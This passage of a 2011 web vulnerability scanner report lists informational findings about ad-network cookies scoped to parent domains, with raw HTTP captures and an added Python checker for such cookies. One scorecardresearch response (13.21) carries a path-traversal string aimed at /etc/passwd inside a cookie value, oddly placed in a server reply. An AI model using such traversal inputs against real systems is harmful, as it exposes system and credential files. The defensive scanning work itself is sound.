Set-Cookie: rsiPus_gdim=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_LRgg=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_-Jfi=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_LVUM=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsi_us_1000000=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_gdim=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_LRgg=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_-Jfi=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_LVUM=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_bTBF="MLtXrEVrsC9jIDFi7XZS/nWyofj8uo4h4hQaMt62x2xHbq9QZyFp4272ogDQaLmA/RMWitRUcC8I7G491XGtkTPsKy5HIvJesYX30b0qu8WXX0HfMJuA3FHVw11laB3EptDJ+unN4T4giuXzXvB3z+ILY6CVMUX/pUeIutokG4ey0jUb+KUX7E2rAO9SAXGUST7XghGegzEMIVRrVRs="; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/
Set-Cookie: rsi_us_1000000="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"; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/
Content-Type: application/x-javascript;charset=ISO-8859-1
Vary: Accept-Encoding
Date: Sun, 04 Sep 2011 00:42:17 GMT
Content-Length: 883

function rsi_img(p,u,c){if(u.indexOf(location.protocol)==0){var i=new Image(2,3);if(c){i.onload=c;}
i.src=u;p[p.length]=i;}}
function rsi_simg(p,s,i){if(i<s.length){rsi_img(p,s[i],function(){rsi_sim
...[SNIP]...

13.14. http://ads.undertone.com/ajs.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.undertone.com
Path:   /ajs.php

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ajs.php?01AD=3KIatKzwD8XkgLR4ju6dOBtbo71SiimUay2RivDe9tJHoFAAUgYCSQg&01RI=5E9E1CAB1AD4553&01NA=&&zoneid=13473&cb=9499299828&t=1315078988.592&fv=10&x=0&y=0&sw=1920&sh=1156&cw=1217&ch=9749&loc=http%3A//content.usatoday.com/communities/campusrivalry/post/2011/09/live-blog-game-opening-saturday-college-football-lsu-oregon-georgia-boise-state/1&ct=1 HTTP/1.1
Host: ads.undertone.com
Proxy-Connection: keep-alive
Referer: http://content.usatoday.com/communities/campusrivalry/post/2011/09/live-blog-game-opening-saturday-college-football-lsu-oregon-georgia-boise-state/1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UTID=4a03b50017dd46ddaa511cbfbfb29e68; A28X=CT-1

Response

HTTP/1.1 200 OK
Server: Apache
Pragma: no-cache
Cache-Control: private, max-age=0, no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Vary: Accept-Encoding
Content-Length: 3605
Content-Type: text/javascript
Date: Sun, 04 Sep 2011 00:45:08 GMT
Connection: close
Set-Cookie: A28X=3KIatKzwD8XkgLR4ju6dOBtbo71SiimUay2RivDe9tJHoFAAUgYCSQg; expires=Sun, 02-Oct-2011 00:45:08 GMT; path=/; domain=.undertone.com
Set-Cookie: UTID=4a03b50017dd46ddaa511cbfbfb29e688473407c8c4fce8899adcc4b; expires=Mon, 03-Sep-2012 00:45:08 GMT; path=/
Set-Cookie: _UTLIA[239096]=; expires=Thu, 01-Jan-1970 00:00:00 GMT; path=/
Set-Cookie: UTLIA=239096.lqz3aw-13473; expires=Tue, 04-Oct-2011 00:45:08 GMT; path=/
Set-Cookie: UTPROFILES=15221%2317%3A1%2C28%7C1022%3A1%7C1023%3A1%7C4209%3A1; expires=Sat, 03-Dec-2011 00:45:08 GMT; path=/
P3P: CP="DSP NOI ADM PSAo PSDo OUR BUS NAV COM UNI INT"

document.write("<"+"SCRIPT language=\'JavaScript1.1\' SRC=\"http://ad.doubleclick.net/adj/N763.no_url_specifiedOX2619/B5770010.3;sz=300x250;pc=[TPAS_ID];click0=http://ads.undertone.com/c?oaparams=2__b
...[SNIP]...

13.15. http://ak1.abmr.net/is/ads.undertone.com

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ak1.abmr.net
Path:   /is/ads.undertone.com

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /is/ads.undertone.com?U=/ajs.php&V=3-Pk%2fbY9lNQC4At5F94KswkvL1NPSP7nt8HKX%2fF6NhEm5cTN68Tlrp4i2kKFtcogeJ&I=5E9E1CAB1AD4553&D=undertone.com&01AD=1&&zoneid=13473&cb=9499299828&t=1315078988.592&fv=10&x=0&y=0&sw=1920&sh=1156&cw=1217&ch=9749&loc=http%3A//content.usatoday.com/communities/campusrivalry/post/2011/09/live-blog-game-opening-saturday-college-football-lsu-oregon-georgia-boise-state/1&ct=1 HTTP/1.1
Host: ak1.abmr.net
Proxy-Connection: keep-alive
Referer: http://content.usatoday.com/communities/campusrivalry/post/2011/09/live-blog-game-opening-saturday-college-football-lsu-oregon-georgia-boise-state/1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 01AI=3HA_EEu1KXWRP0QJym87Nlm7xnI-zcps1f5SV9G66zkM0FxK6B8vp8g

Response

HTTP/1.1 302 Moved Temporarily
Content-Length: 0
Location: http://ads.undertone.com/ajs.php?01AD=3LbeoS9TTQFE4L2AwPSPny5JgU_8NH14s0kXLQW6tpcN6pXxIaedm5Q&01RI=5E9E1CAB1AD4553&01NA=&&zoneid=13473&cb=9499299828&t=1315078988.592&fv=10&x=0&y=0&sw=1920&sh=1156&cw=1217&ch=9749&loc=http%3A//content.usatoday.com/communities/campusrivalry/post/2011/09/live-blog-game-opening-saturday-college-football-lsu-oregon-georgia-boise-state/1&ct=1
Expires: Sun, 04 Sep 2011 00:45:08 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 04 Sep 2011 00:45:08 GMT
Connection: close
Set-Cookie: 01AI=2-2-F6248E50D3C9B20BFFF9EB5EA664B56B73DB880669BDB36D0AED2F292EE60908-3CC9ECB738DC6097BABD3A5783E7E50840BA1F5253AE728A47DC91643B7FE4A9; expires=Mon, 03-Sep-2012 00:45:08 GMT; path=/; domain=.abmr.net
P3P: policyref="http://www.abmr.net/w3c/policy.xml", CP="NON DSP COR CURa ADMa DEVa OUR SAMa IND"


13.16. http://ak1.abmr.net/is/tag.admeld.com

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ak1.abmr.net
Path:   /is/tag.admeld.com

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /is/tag.admeld.com?U=/ad/js/741/mcclatchy/728x90/sacramento_sacbee&V=3-u9rS3RK4%2fHVCpMS5%2fXkUHptR4WXGInZ3QrOhpGcpkOGTF%2fH6Fxq4JA%3d%3d&I=5FB3F64412C0344&D=admeld.com&01AD=1&t=1315097086910&tz=300&m=2&hu=&ht=js&hp=0&fo=&url=http%3A%2F%2Fwww.sacbee.com%2F2011%2F09%2F03%2F3883102%2Fsprint-could-be-winner-in-thwarted.html&refer=http%3A%2F%2Fwww.sacbee.com%2F2011%2F09%2F03%2F3883102%2Fsprint-could-be-winner-in-thwarted.html HTTP/1.1
Host: ak1.abmr.net
Proxy-Connection: keep-alive
Referer: http://www.sacbee.com/2011/09/03/3883102/sprint-could-be-winner-in-thwarted.html
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 01AI=2-2-31180B5D5D231F5622E9106D62F00B2EDF4A7C273A353023DD5E966844A1A54B-6809602891ACEF76A3868E1D4796F5A99983F94421DBF59156B8599DC3F68A9D

Response

HTTP/1.1 302 Moved Temporarily
Content-Length: 0
Location: http://tag.admeld.com/ad/js/741/mcclatchy/728x90/sacramento_sacbee?01AD=32YTIBBAp3mT-Zua6BVL7Ucqbkbllihfkgh02ZrjxdWTDGXg-HimksA&01RI=5FB3F64412C0344&01NA=&t=1315097086910&tz=300&m=2&hu=&ht=js&hp=0&fo=&url=http%3A%2F%2Fwww.sacbee.com%2F2011%2F09%2F03%2F3883102%2Fsprint-could-be-winner-in-thwarted.html&refer=http%3A%2F%2Fwww.sacbee.com%2F2011%2F09%2F03%2F3883102%2Fsprint-could-be-winner-in-thwarted.html
Expires: Sun, 04 Sep 2011 01:01:16 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 04 Sep 2011 01:01:16 GMT
Connection: close
Set-Cookie: 01AI=2-2-159DEC38549F1F614D8A2426086D786875EEE45322C9F9736F0A6F6D9BF2D701-1607A532E50134DBA4C933F2985A2049EDBF2DD011F46699E08DEA173165718C; expires=Mon, 03-Sep-2012 01:01:16 GMT; path=/; domain=.abmr.net
P3P: policyref="http://www.abmr.net/w3c/policy.xml", CP="NON DSP COR CURa ADMa DEVa OUR SAMa IND"


13.17. http://api.bizographics.com/v1/profile.redirect

Summary

Severity:   Information
Confidence:   Certain
Host:   http://api.bizographics.com
Path:   /v1/profile.redirect

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain. The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /v1/profile.redirect?api_key=798c7ba2e6b04aec86d660f36f6341a5&callback_url=http://rt.legolas-media.com/lgrt?ci=1%26ei=21%26ti=95%26vi=11%26sti=28%26sei=0%26sci=0%26sai=0%26smi=0%26pbi=0%26sts=1315096942310726%26sui=5ea31fa9-d42d-458f-9bb4-1700d69738c0 HTTP/1.1
Host: api.bizographics.com
Proxy-Connection: keep-alive
Referer: http://www.reuters.com/article/2011/09/03/us-weather-football-idUSTRE78222D20110903
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BizoID=6439dd87-a6df-42d4-8c18-e9c26d5d40b4; BizoData=Pp1FHRK43Zz2RAI0uRfisMtQb1MaQBj6WQYgisqeiidjQcqwKPXXDYVmkoawipO0Dfq1j0w30sQL9madkf8kozH7KdOKh03Kvii5Taj5XcunNcMDa7Re6IGD4lKWNB0md3rj0Ad6xyMUDLG6hh7sErqHyaoEyKUrunjtqgDfn74jNwcPJZXKAa9DdLgeLHSyEVCqewehdQ95muedOoesP2U0B4uSKJipWuwJodXwOG6Ckz6TNNGdaF6nEbrp2RisySjMfsp04qHTcqipLlNqPldy6c1wwH4DELwm2ipwNsNipLFWKZvgDTbwiiAhQOisLcafhbACBAJnPyXdljTHnfyBp1sJ7Vvkc46t01cWfT12ipyKbm8481vVAn4t3h6RTVissytDGtO0HVbGfbrxfWf6nc4wINO1L7830xNl7tETxisz59RGoQec9sU8nhAxdAK9Qieie

Response

HTTP/1.1 302 Moved Temporarily
Cache-Control: no-cache
Date: Sun, 04 Sep 2011 00:57:21 GMT
Location: http://rt.legolas-media.com/lgrt?ci=1&ei=21&ti=95&vi=11&sti=28&sei=0&sci=0&sai=0&smi=0&pbi=0&sts=1315096942310726&sui=5ea31fa9-d42d-458f-9bb4-1700d69738c0&industry=business_services&location=texas
P3P: CP="NON DSP COR CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
Pragma: no-cache
Server: nginx/0.7.61
Set-Cookie: BizoID=6439dd87-a6df-42d4-8c18-e9c26d5d40b4;Version=0;Domain=.bizographics.com;Path=/;Max-Age=15768000
Set-Cookie: BizoData=vipSsUXrfhMAyjSpNgk6T39Qb1MaQBj6WQYgisqeiidjQcqwKPXXDYVmkoawipO0Dfq1j0w30sQL9madkf8kozH7KUm1bPVkNOW1aj5XcunNcMDa7Re6IGD4lHbY24BlLWUpAd6xyMUDLG5gCh8GmE4wmnnS9ty8xAR0zwQvdHhisgnnwCNICmFKGa6pvfuPrL6gLlop56fA3rHonFMZ1E3OcisUUeXmc77bBFklv3wQQEmtQD6vWJNOjnJP31qI3sBpawEVUJBxdqAyC8xfc9PPC4jRiscMdipXP44sTMcaVpEYlLIipNN9QFd9eD8AHJR2FGdEz1hYSFbR3chAU2xWtyvDfXYqVKvKL6ku8zbNip0rRSsoluJtm3Lu8fisWbDneEWVJTB2iiSz7mTslQLR60k3zySHYwieie;Version=0;Domain=.bizographics.com;Path=/;Max-Age=15768000
X-Bizo-Usage: 1
Content-Length: 0
Connection: keep-alive


13.18. http://as.casalemedia.com/s

Summary

Severity:   Information
Confidence:   Certain
Host:   http://as.casalemedia.com
Path:   /s

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain. The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /s?s=102679&u=http%3A//www.sacbee.com/2011/09/03/3883102/sprint-could-be-winner-in-thwarted.html&f=1&id=5352232557.328876 HTTP/1.1
Host: as.casalemedia.com
Proxy-Connection: keep-alive
Referer: http://www.sacbee.com/2011/09/03/3883102/sprint-could-be-winner-in-thwarted.html
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CMID=qPptfUPS1JUAAD6emfQAAAAa; CMPS=179; CMPP=016; CMS=65131&1314825471&95308&1314825468; CMD1=AAErg05epP8AAP5rAAL86wEBAAABTHFOXqT8AAF0TAADQ4wBAQA*

Response

HTTP/1.1 200 OK
Server: Apache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Content-Length: 0
Content-Type: text/plain
Expires: Sun, 04 Sep 2011 01:02:07 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 04 Sep 2011 01:02:07 GMT
Connection: close
Set-Cookie: CMID=qPptfUPS1JUAAD6emfQAAAAa;domain=casalemedia.com;path=/;expires=Mon, 03 Sep 2012 01:02:07 GMT
Set-Cookie: CMPS=179;domain=casalemedia.com;path=/;expires=Sat, 03 Dec 2011 01:02:07 GMT
Set-Cookie: CMPP=016;domain=casalemedia.com;path=/;expires=Sat, 03 Dec 2011 01:02:07 GMT
Set-Cookie: CMST=TmLJ305izg8C;domain=casalemedia.com;path=/;expires=Mon, 05 Sep 2011 01:02:07 GMT
Set-Cookie: CMDD=AAF1owI*;domain=casalemedia.com;path=/;expires=Mon, 05 Sep 2011 01:02:07 GMT


13.19. http://b.scorecardresearch.com/b

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /b

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b?c1=2&c2=6035223&c3=&c4=&c5=&c6=&c15=&ns__t=1315096975227&ns_c=UTF-8&c8=Blog%3A%20Stay%20updated%20on%20Oregon-LSU%20and%20other%20college%20football%20action&c7=http%3A%2F%2Fcontent.usatoday.com%2Fcommunities%2Fcampusrivalry%2Fpost%2F2011%2F09%2Flive-blog-game-opening-saturday-college-football-lsu-oregon-georgia-boise-state%2F1&c9=http%3A%2F%2Fwww.google.com%2Ftrends%2Fhottrends%3Fq%3Dnotre%2Bdame%2Bfootball%26date%3D2011-9-3%26sa%3DX HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://content.usatoday.com/communities/campusrivalry/post/2011/09/live-blog-game-opening-saturday-college-football-lsu-oregon-georgia-boise-state/1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=9951d9b8-80.67.74.150-1314793633

Response

HTTP/1.1 204 No Content
Content-Length: 0
Date: Sun, 04 Sep 2011 00:42:17 GMT
Connection: close
Set-Cookie: UID=9951d9b8-80.67.74.150-1314793633; expires=Tue, 03-Sep-2013 00:42:17 GMT; path=/; domain=.scorecardresearch.com
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID OUR IND COM STA OTC"
Pragma: no-cache
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate
Server: CS


13.20. http://b.scorecardresearch.com/p

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /p

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /p?c1=7&c2=2000002&c3=1&cv=2.0&cj=1 HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://content.usatoday.com/communities/campusrivalry/post/2011/09/live-blog-game-opening-saturday-college-football-lsu-oregon-georgia-boise-state/1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=9951d9b8-80.67.74.150-1314793633

Response

HTTP/1.1 200 OK
Content-Length: 43
Content-Type: image/gif
Date: Sun, 04 Sep 2011 00:43:15 GMT
Connection: close
Set-Cookie: UID=9951d9b8-80.67.74.150-1314793633; expires=Tue, 03-Sep-2013 00:43:15 GMT; path=/; domain=.scorecardresearch.com
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID OUR IND COM STA OTC"
Pragma: no-cache
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate
Server: CS

GIF89a.............!.......,...........D..;

13.21. http://b.scorecardresearch.com/r

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /r

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /r?c2=6035363&d.c=gif&d.o=nmcharlotte&d.x=221978921&d.t=page&d.u=http%3A%2F%2Fwww.charlotteobserver.com%2F2011%2F09%2F03%2F2577566%2Fraceday-danica-already-gone.html HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://www.charlotteobserver.com/2011/09/03/2577566/raceday-danica-already-gone.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=9951d9b8-80.67.74.150-1314793633

Response

HTTP/1.1 200 OK
Content-Length: 43
Content-Type: image/gif
Date: Sun, 04 Sep 2011 01:08:16 GMT
Connection: close
Set-Cookie: UID=9951d9b8-80.67.74.150-1314793633../../../../../../../../etc/passwd%009951d9b8-80.67.74.150-1314793633; expires=Tue, 03-Sep-2013 01:08:16 GMT; path=/; domain=.scorecardresearch.com
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID OUR IND COM STA OTC"
Pragma: no-cache
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate
Server: CS

GIF89a.............!.......,...........D..;
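
Added example, not part of the scanner output on this page: the check behind this class of finding, written in Python for this report. It pulls the Set-Cookie headers out of a raw response like the one captured above, reports whether each cookie's Domain attribute names a parent of the issuing host (RFC 6265 ignores the leading dot, so `domain=.scorecardresearch.com` set by `b.scorecardresearch.com` is parent-scoped and is sent to every sibling host under that domain), records whether HttpOnly and Secure are present, and applies a crude session-token heuristic based on the cookie name and the value's per-character entropy. The function names (`analyse`, `is_parent_scope`, `looks_like_session_token`), the session-name list and the 4-bit entropy threshold are this example's assumptions, not the scanner's rule; the sample response is constructed from the scorecardresearch UID cookie in the capture above plus a hypothetical JSESSIONID cookie.

```python
"""Flag Set-Cookie headers whose Domain attribute is a parent of the issuing host.

Illustrative code added for this page; it is not the scanner that produced the
report. The session-token heuristic (cookie name plus value entropy) is an
assumption of this example, not the scanner's own rule.
"""
import math
import re
from collections import Counter
from dataclasses import dataclass
from typing import Optional

# Cookie names that commonly carry a session identifier (assumed list).
SESSION_NAME_RE = re.compile(r"sess|sid|token|auth|login", re.I)


@dataclass
class CookieFinding:
    name: str
    value: str
    domain: Optional[str]   # Domain attribute as sent; None means host-only
    parent_scoped: bool     # Domain names a parent of the issuing host
    httponly: bool
    secure: bool
    session_like: bool


def set_cookie_headers(raw_response: str) -> list:
    """Return the value of every Set-Cookie header in a raw HTTP response."""
    head = raw_response.replace("\r\n", "\n").split("\n\n", 1)[0]
    values = []
    for line in head.split("\n")[1:]:            # skip the status line
        key, sep, val = line.partition(":")
        if sep and key.strip().lower() == "set-cookie":
            values.append(val.strip())
    return values


def shannon_entropy(s: str) -> float:
    """Bits per character, estimated from the value's own symbol frequencies."""
    if not s:
        return 0.0
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in Counter(s).values())


def is_parent_scope(host: str, domain: Optional[str]) -> bool:
    """True when Domain names a proper parent of the issuing host.

    RFC 6265 ignores a leading dot, so '.example.com' and 'example.com' are
    the same scope. A Domain equal to the host itself is not parent-scoped,
    and 'scorecardresearch.com' does not match 'evil-scorecardresearch.com'.
    """
    if not domain:
        return False
    host = host.lower().rstrip(".")
    domain = domain.lower().strip(".")
    return host != domain and host.endswith("." + domain)


def looks_like_session_token(name: str, value: str) -> bool:
    """Crude heuristic: a long value with a session-ish name or high entropy."""
    if len(value) < 16:
        return False
    if SESSION_NAME_RE.search(name):
        return True
    return shannon_entropy(value) >= 4.0


def parse_set_cookie(host: str, header_value: str) -> CookieFinding:
    """Split one Set-Cookie value into name=value plus attributes and score it."""
    parts = [p.strip() for p in header_value.split(";") if p.strip()]
    name, _, value = parts[0].partition("=")
    attrs = {}
    for p in parts[1:]:
        k, _, v = p.partition("=")
        attrs[k.strip().lower()] = v.strip()   # flags like HttpOnly map to ''
    domain = attrs.get("domain") or None
    return CookieFinding(
        name=name.strip(),
        value=value,
        domain=domain,
        parent_scoped=is_parent_scope(host, domain),
        httponly="httponly" in attrs,
        secure="secure" in attrs,
        session_like=looks_like_session_token(name.strip(), value),
    )


def analyse(host: str, raw_response: str) -> list:
    """One CookieFinding per Set-Cookie header in the response."""
    return [parse_set_cookie(host, h) for h in set_cookie_headers(raw_response)]


# Constructed sample: the scorecardresearch UID cookie from the capture above,
# plus a hypothetical JSESSIONID cookie to show what a session-like value looks like.
SAMPLE_HOST = "b.scorecardresearch.com"
SAMPLE_RESPONSE = (
    "HTTP/1.1 200 OK\r\n"
    "Content-Type: image/gif\r\n"
    "Set-Cookie: UID=9951d9b8-80.67.74.150-1314793633; "
    "expires=Tue, 03-Sep-2013 00:43:15 GMT; path=/; domain=.scorecardresearch.com\r\n"
    "Set-Cookie: JSESSIONID=5A3F1C9E2B7D4E6F8A1B2C3D4E5F6A7B; Path=/; "
    "Domain=.scorecardresearch.com; HttpOnly\r\n"
    "Server: CS\r\n"
    "\r\n"
    "GIF89a...\r\n"
)

if __name__ == "__main__":
    for f in analyse(SAMPLE_HOST, SAMPLE_RESPONSE):
        scope = "PARENT-SCOPED" if f.parent_scoped else "host-only or self"
        print(f"{f.name}: domain={f.domain} [{scope}] httponly={f.httponly} "
              f"secure={f.secure} session_like={f.session_like}")
```

Run it directly to print one line per cookie. A parent-scoped cookie only matters when the value is a session token or other secret that a sibling host should not be able to read or overwrite; for the ad-network identifiers in this report the wide scope is by design, which is why the scanner rates each of these findings Information and tells you to review the cookie's function rather than treating it as a defect.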

13.22. http://bh.contextweb.com/bh/rtset

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bh.contextweb.com
Path:   /bh/rtset

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain (see the response below). The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /bh/rtset HTTP/1.1
Host: bh.contextweb.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
X-Powered-By: Servlet/3.0
Server: GlassFish v3
CW-Server: cw-app604
Cache-Control: no-cache, no-store
Set-Cookie: V=LZLz3N9wRgPO; Domain=.contextweb.com; Expires=Wed, 29-Aug-2012 01:21:59 GMT; Path=/
Content-Length: 0
Date: Sun, 04 Sep 2011 01:21:58 GMT
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"


13.23. http://c7.zedo.com/bar/v16-504/c5/jsc/fm.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://c7.zedo.com
Path:   /bar/v16-504/c5/jsc/fm.js

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain (see the response below). The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /bar/v16-504/c5/jsc/fm.js HTTP/1.1
Host: c7.zedo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Length: 987
Content-Type: application/x-javascript
Set-Cookie: FFad=2:12:9:9:1;expires=Sun, 04 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=0,0,0:305,825,15:305,825,0:0,825,15:305,0,15;expires=Sun, 04 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "8710bb37-8952-4aa4e77af70c0"
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=209
Expires: Sun, 04 Sep 2011 01:25:35 GMT
Date: Sun, 04 Sep 2011 01:22:06 GMT
Connection: close

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var y10=new Image();

y10.src='http://r1.zedo.com/ads2/p/'+Math.random()+'/ERR.gif?v=bar/v16-504/c5;referrer='+document.referrer+';tag=c7.ze
...[SNIP]...

13.24. http://c7.zedo.com/bar/v16-504/c5/jsc/fmr.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://c7.zedo.com
Path:   /bar/v16-504/c5/jsc/fmr.js

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain (see the response below). The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /bar/v16-504/c5/jsc/fmr.js?c=825/403/1&a=0&f=&n=305&r=13&d=15&q=&$=&s=263&z=0.7735994893591851 HTTP/1.1
Host: c7.zedo.com
Proxy-Connection: keep-alive
Referer: http://www.charlotteobserver.com/2011/09/03/2577566/raceday-danica-already-gone.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZFFBbh=977B826,20|121_977#0; ZFFAbh=977B826,20|121_977#365; FFBbh=977B305,20|149_1#0; FFgeo=5386156; FFAbh=977B305,20|149_1#365; ZEDOIDA=k5xiThcyanucBq9IXvhSGSz5~090311; ZCBC=1

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
